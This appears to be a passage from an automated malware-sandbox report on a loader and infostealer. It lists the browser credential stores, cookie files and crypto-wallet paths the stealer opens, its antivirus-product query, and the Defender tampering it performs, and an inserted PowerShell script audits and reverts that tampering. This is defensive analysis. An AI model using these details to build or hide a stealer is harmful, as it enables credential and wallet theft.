Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E0FD6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_020E1475
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 9_2_020E0CE9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020E157B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020D9586
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: GetLocaleInfoA, 11_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: GetLocaleInfoA, 11_2_004085BC
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 11_2_0045892C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0054100D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 3_2_0054100D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00441F10 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError, 3_2_00441F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042DB80 RtlGetVersion,GetVersionExA, 3_2_0042DB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.0000000001107000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
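The last lines show the payload inside RegAsm.exe checking what protects the machine: it carries the path to MsMpEng.exe, reads MachineGuid as a host identifier and asks ROOT\SecurityCenter2 for the registered AntiVirusProduct entries, while Install.exe has already set four threat IDs under ThreatIDDefaultAction to 6 (Allow), excluded the exe extension through MSFT_MpPreference and registered itself as a SYSTEM scheduled task in %TEMP%. The script below is an added example, not part of the report or of any of the samples: run elevated, it collects exactly that state from a host and can reverse it. The action-code table is Defender's ThreatIDDefaultAction mapping; treating every SYSTEM task that points into AppData\Local\Temp as suspect is an assumption to adjust.

```powershell
# Added example, not part of the report or of the samples it describes.
# Audits the Defender state the sample changes and undoes it. Run elevated.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction'
# Defender action codes used by ThreatIDDefaultAction; the sample writes 6 (Allow)
$actionNames = @{ '1'='Clean'; '2'='Quarantine'; '3'='Remove'; '6'='Allow'; '8'='UserDefined'; '9'='NoAction'; '10'='Block' }

function Get-DefenderTamperState {
    $overrides = @()
    if (Test-Path $policyKey) {
        $props = Get-ItemProperty -Path $policyKey
        # value names under this key are threat IDs, so keep only the numeric properties
        foreach ($prop in ($props.PSObject.Properties | Where-Object { $_.Name -match '^\d+$' })) {
            $code    = [string]$prop.Value
            $meaning = if ($actionNames.ContainsKey($code)) { $actionNames[$code] } else { 'unknown' }
            $overrides += [pscustomobject]@{ ThreatId = $prop.Name; Action = $code; Meaning = $meaning }
        }
    }
    $pref = Get-MpPreference
    [pscustomobject]@{
        ThreatIdOverrides     = $overrides
        MpPreferenceThreatIds = @($pref.ThreatIDDefaultAction_Ids)      # same list as Defender reports it
        ExclusionExtensions   = @($pref.ExclusionExtension)             # the sample adds 'exe'
        ExclusionPaths        = @($pref.ExclusionPath)
        SystemTasksFromTemp   = @(Get-ScheduledTask | Where-Object {
                                    $_.Principal.UserId -eq 'SYSTEM' -and
                                    ($_.Actions | Where-Object { $_.Execute -match '\\AppData\\Local\\Temp\\' }) })
        # what the sample itself reads; the namespace is absent on Server SKUs
        AvProducts            = @(Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
                                  Select-Object displayName, productState)
    }
}

function Undo-DefenderTamper {
    param([object]$State = (Get-DefenderTamperState))
    foreach ($o in $State.ThreatIdOverrides) {
        Remove-ItemProperty -Path $policyKey -Name $o.ThreatId -Force
    }
    if ($State.ExclusionExtensions.Count -gt 0) {
        Remove-MpPreference -ExclusionExtension $State.ExclusionExtensions
    }
    foreach ($t in $State.SystemTasksFromTemp) {
        Unregister-ScheduledTask -TaskName $t.TaskName -TaskPath $t.TaskPath -Confirm:$false
    }
    gpupdate.exe /force | Out-Null   # the same call the sample makes, here to apply the cleaned policy
}

$state = Get-DefenderTamperState
$state | Format-List
# Review $state.ThreatIdOverrides, then: Undo-DefenderTamper -State $state
```

ThreatIdOverrides must be reviewed before Undo-DefenderTamper removes them: a domain GPO can set this list legitimately and will write it back at the next refresh, so on a domain-joined host the fix belongs in the GPO. The exe exclusion is the more damaging change, because every later stage the loader drops (the files under Documents\iofolko5 in this run) then runs unscanned; Remove-MpPreference takes the whole array in one call. AvProducts is shown so the responder sees the same answer the stealer got from SecurityCenter2.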

Stealing of Sensitive Information

Source: Yara match File source: 00000006.00000003.2335001798.0000000003F8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: 0000000D.00000002.2682333164.0000000002CA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2681681292.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: playglock32x64.exe PID: 8056, type: MEMORYSTR
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Electrum
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: \ElectronCash\wallets
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: \@trezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Exodus EdenDogecoin
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Jaxx Liberty
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: \Exodus\backup
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Exodus\
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: G__XJZ9ACVwRjgVn6BXId6E1.exe PID: 7876, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: 0000000D.00000002.2682333164.0000000002CA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2681681292.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: playglock32x64.exe PID: 8056, type: MEMORYSTR